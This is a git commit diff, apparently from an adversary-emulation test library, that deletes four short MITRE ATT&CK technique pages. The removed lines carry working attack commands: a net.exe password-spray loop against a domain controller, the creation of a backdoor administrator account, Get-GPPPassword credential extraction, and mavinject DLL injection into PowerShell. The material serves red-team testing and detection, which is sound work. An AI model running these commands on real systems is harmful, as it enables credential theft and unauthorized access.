clean up completed md
This commit is contained in:
caseysmithrc
@@ -1,16 +0,0 @@
|
||||
# Brute Force
|
||||
|
||||
MITRE ATT&CK Technique: [T1110](https://attack.mitre.org/wiki/Technique/T1110)
|
||||
|
||||
## net.exe
|
||||
|
||||
### Password Spray
|
||||
|
||||
|
||||
net user /domain > DomainUsers.txt
|
||||
echo "Password1" >> pass.txt
|
||||
echo "1q2w3e4r" >> pass.txt
|
||||
|
||||
Execute:
|
||||
|
||||
@FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
|
||||
@@ -1,35 +0,0 @@
|
||||
# Create Account
|
||||
|
||||
MITRE ATT&CK Technique: [T1136](https://attack.mitre.org/wiki/Technique/T1136)
|
||||
|
||||
## Net.exe
|
||||
|
||||
Local user add:
|
||||
|
||||
Net user /add Trevor SmshBgr123
|
||||
|
||||
Add new user to localgroup:
|
||||
|
||||
net localgroup administrators Trevor /add
|
||||
|
||||
Domain add:
|
||||
|
||||
net user <username> \password \domain
|
||||
|
||||
Add user to Active Directory:
|
||||
|
||||
dsadd user CN=John,CN=Users,DC=it,DC=uk,DC=savilltech,DC=com -samid John -pwd Pa55word123
|
||||
|
||||
# Powershell 5.1
|
||||
|
||||
The following requires [Powershell 5.1](https://www.microsoft.com/en-us/download/details.aspx?id=54616)
|
||||
|
||||
Additional information [here](https://4sysops.com/archives/the-new-local-user-and-group-cmdlets-in-powershell-5-1/)
|
||||
|
||||
## Add User
|
||||
|
||||
New-LocalUser -FullName 'Trevor R.' -Name 'Trevor' -Password SmshBgr ‑Description 'Pwnage account'
|
||||
|
||||
## Create a group
|
||||
|
||||
New-LocalGroup -Name 'Testgroup' -Description 'Testing group'
|
||||
@@ -1,12 +0,0 @@
|
||||
# Credentials in Files
|
||||
|
||||
MITRE ATT&CK Technique: [T1081](https://attack.mitre.org/wiki/Technique/T1081)
|
||||
|
||||
## Group Policy Preference
|
||||
|
||||
[Payload](Payloads/Get-GPPPassword.ps1)
|
||||
[PowerSploit Source](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)
|
||||
|
||||
Input:
|
||||
|
||||
Get-GPPPassword -Server EXAMPLE.COM
|
||||
@@ -1,12 +0,0 @@
|
||||
## Hooking
|
||||
|
||||
MITRE ATT&CK Technique: [T1179](https://attack.mitre.org/wiki/Technique/T1179)
|
||||
|
||||
### Sample Windows DLL Injection into PowerShell
|
||||
|
||||
mavinject $pid /INJECTRUNNING C:\Atomic\AtomicSSLHook.dll
|
||||
|
||||
## Test Script
|
||||
|
||||
[AtomicSSLHook.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AtomicSSLHook.dll)
|
||||
|
||||
Reference in New Issue
Block a user